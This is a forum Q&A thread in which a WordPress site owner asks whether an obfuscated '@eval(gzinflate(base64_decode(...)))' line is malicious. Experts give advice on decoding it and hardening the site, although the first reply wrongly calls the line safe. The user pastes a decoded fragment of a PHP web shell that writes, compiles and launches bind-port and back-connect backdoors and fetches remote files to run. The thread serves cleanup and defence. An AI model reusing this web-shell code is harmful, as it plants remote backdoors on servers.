Solved

Is this Malicious code?

Posted on 2011-03-23
10
403 Views
Last Modified: 2012-05-11
Is this line of code safe:

@eval(gzinflate(base64_decode($code)));

I found it in one of my wordpress files...
0
Comment
Question by:checkmofoshoduno
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 2
  • 2
  • 2
  • +3
10 Comments
 

Expert Comment

by:eaglerod
ID: 35204600
No this is not malicious code.

The 'Code' represents the scrambled code (aka encoded text, aka obfuscated code) containing random letters, numbers and/or characters.
0
 

Author Comment

by:checkmofoshoduno
ID: 35204603
How can i check to see what the code actually is when its decoded?
0
 
LVL 14

Expert Comment

by:Phil Phillips
ID: 35204630
I'm pretty sure that is malicious.  In fact, from what I can tell, eval(base64_decode(…)) is a common way of 'hacking' Wordpress.

If you have the Suhosin patch, you might want to even consider disabling eval():
http://www.hardened-php.net/suhosin/configuration.html#suhosin.executor.disable_eval
0
PeopleSoft Has Never Been Easier

PeopleSoft Adoption Made Smooth & Simple!

On-The-Job Training Is made Intuitive & Easy With WalkMe's On-Screen Guidance Tool.  Claim Your Free WalkMe Account Now

 

Expert Comment

by:eaglerod
ID: 35204631
I believe this is what you are looking for.

Decoding Information
0
 
LVL 70

Expert Comment

by:Jason C. Levine
ID: 35204633
Hi checkmofoshoduno,

It's probably code for an advertising link or something similar that some theme developers embed into the theme.  It may not be malicious, but it may be something you don't want there either.

I would find the $code variable and get the string and run it through a decoder, either on another site such as:

http://www.tareeinternet.com/forum/knowledgebase/274-decoding-eval-gzinflate-base64_decode.html

or just as a simple echo statement in a PHP file you create.
0
 
LVL 4

Expert Comment

by:m_walker
ID: 35204634
@eval(gzinflate(base64_decode($code)));

try
$Temp = gzinflate(base64_decode($code));
echo $Temp;

Note sure where $code gets its value from.
The code could be binary, so expect some weird results.
0
 

Author Comment

by:checkmofoshoduno
ID: 35204644
Yep i managed to also find that link for the decoder and unless that site is messing with me i am seeing the output say "Load and Exploit" and a bunch of other not so good things such as Port Binding

Looks like i will just remove that block of code for now...

Please see attached.
Process found running, backdoor setup successfully.

"; } else { $msg = "

Process not found running, backdoor not setup successfully.
"; } } elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "

Process found running, backdoor setup successfully.
"; } else { $msg = "

Process not found running, backdoor not setup successfully.
"; } } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) { $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?>

Open in new window

0
 
LVL 27

Expert Comment

by:Lukasz Chmielewski
ID: 35204821
The additional question - how did it get there ? Change your access passwords to strong ones and do not store them locally on your computer.
0
 
LVL 14

Accepted Solution

by:
Phil Phillips earned 500 total points
ID: 35204927
Roads_Roads brings up a very good point.  You may want to run your site logs through something like OSSEC.

Also, here are some additional tips on how to make Wordpress more secure:
http://codex.wordpress.org/Hardening_WordPress

And, here's a few blog posts that discuss how to recover from a hacked Wordpress installation (hopefully, your installation isn't fully compromised, but these links also have additional security tips):
http://www.snipe.net/2010/01/when-wordpress-gets-hacked/
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://ocaoimh.ie/did-your-wordpress-site-get-hacked/
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

In addition to that, you should still consider disabling eval (see my earlier comment), if you can.
0
 
LVL 70

Expert Comment

by:Jason C. Levine
ID: 35208486
It's not necessarily a hack on the site.  I have seen code like this included in many, many free WordPress themes by the theme author.  If you are downloading free stuff directly from an author's web site (and not the WordPress site) make sure you go over it very carefully for exploits.
0

Featured Post

Salesforce Made Easy to Use

On-screen guidance at the moment of need enables you & your employees to focus on the core, you can now boost your adoption rates swiftly and simply with one easy tool.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Foreword (July, 2015) Since I first wrote this article, years ago, a great many more people have begun using the internet.  They are coming online from every part of the globe, learning, reading, shopping and spending money at an ever-increasing ra…
Part of the Global Positioning System A geocode (https://developers.google.com/maps/documentation/geocoding/) is the major subset of a GPS coordinate (http://en.wikipedia.org/wiki/Global_Positioning_System), the other parts being the altitude and t…
The purpose of this video is to demonstrate how to update a WordPress Site’s version. WordPress releases new versions of its software frequently and it is important to update frequently in order to keep your site secure, and to get new WordPress…
The purpose of this video is to demonstrate how to set up an RSS Feed on a WordPress Website. This will be demonstrated using a Windows 8 PC. Feedburner will be used for this demonstration. Go to your WordPress login page. This will look like the…

729 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question